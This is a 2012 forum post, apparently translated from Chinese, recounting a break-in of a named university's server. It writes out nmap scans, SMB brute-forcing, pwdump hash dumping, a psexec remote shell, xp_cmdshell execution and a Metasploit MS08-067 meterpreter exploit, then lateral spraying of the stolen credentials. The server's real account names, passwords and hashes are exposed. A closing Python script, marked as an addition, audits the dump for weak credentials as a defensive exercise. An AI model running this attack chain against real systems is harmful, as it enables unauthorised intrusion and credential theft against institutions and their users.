Breaking into Guangxi Normal University with nmap + msf
Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack~~
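As an added example that is not part of the original post, the following Python audit parses smb-pwdump result lines in the format shown above and flags what that dump reveals about the host's credential hygiene: accounts with blank passwords, LM hashes still being stored, and LM hashes whose second half is the padding constant AAD3B435B51404EE, which means the password is seven characters or fewer (the page's test account, password 123456, shows exactly this). The sample lines are constructed from the dump above; the Finding class and the issue strings are this example's own.

```python
import re
from dataclasses import dataclass

# Added example, not from the original post. pwdump prints this 32-character
# placeholder where an account's hash is empty (i.e. a blank password).
NO_PASSWORD = "NO PASSWORD*********************"
# An LM hash is two halves of 7 bytes each; a password of 7 characters or fewer
# leaves the second half as pure padding, which always hashes to this value.
LM_EMPTY_HALF = "AAD3B435B51404EE"

# One smb-pwdump result line: "| user:rid => LMHASH:NTHASH" (or "|_" on the last line).
LINE_RE = re.compile(r"^\|_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)$")


@dataclass
class Finding:
    user: str
    rid: int
    issues: list


def audit_line(line):
    """Return a Finding for one dump line, or None if it is not a hash line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, rid = m.group("user").strip(), int(m.group("rid"))
    lm, nt = m.group("lm").strip().upper(), m.group("nt").strip().upper()
    issues = []
    if nt == NO_PASSWORD:
        issues.append("blank password")
        if rid == 500:  # RID 500 is always the built-in Administrator account
            issues.append("built-in Administrator has a blank password")
    elif lm != NO_PASSWORD:
        # A real LM hash is present: the host still stores the legacy LM format.
        issues.append("LM hash stored")
        if lm.endswith(LM_EMPTY_HALF):
            issues.append("password is 7 characters or fewer")
    return Finding(user, rid, issues)


def audit(lines):
    """Return only the accounts that have at least one issue."""
    findings = (audit_line(line) for line in lines)
    return [f for f in findings if f is not None and f.issues]


# Constructed sample in the page's format (hash values are those in the dump above).
SAMPLE = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
""".splitlines()
```

Running `audit(SAMPLE)` reports all four accounts; an account whose LM half shows the NO PASSWORD placeholder with a real NT hash (NoLMHash in effect, non-blank password) produces no finding.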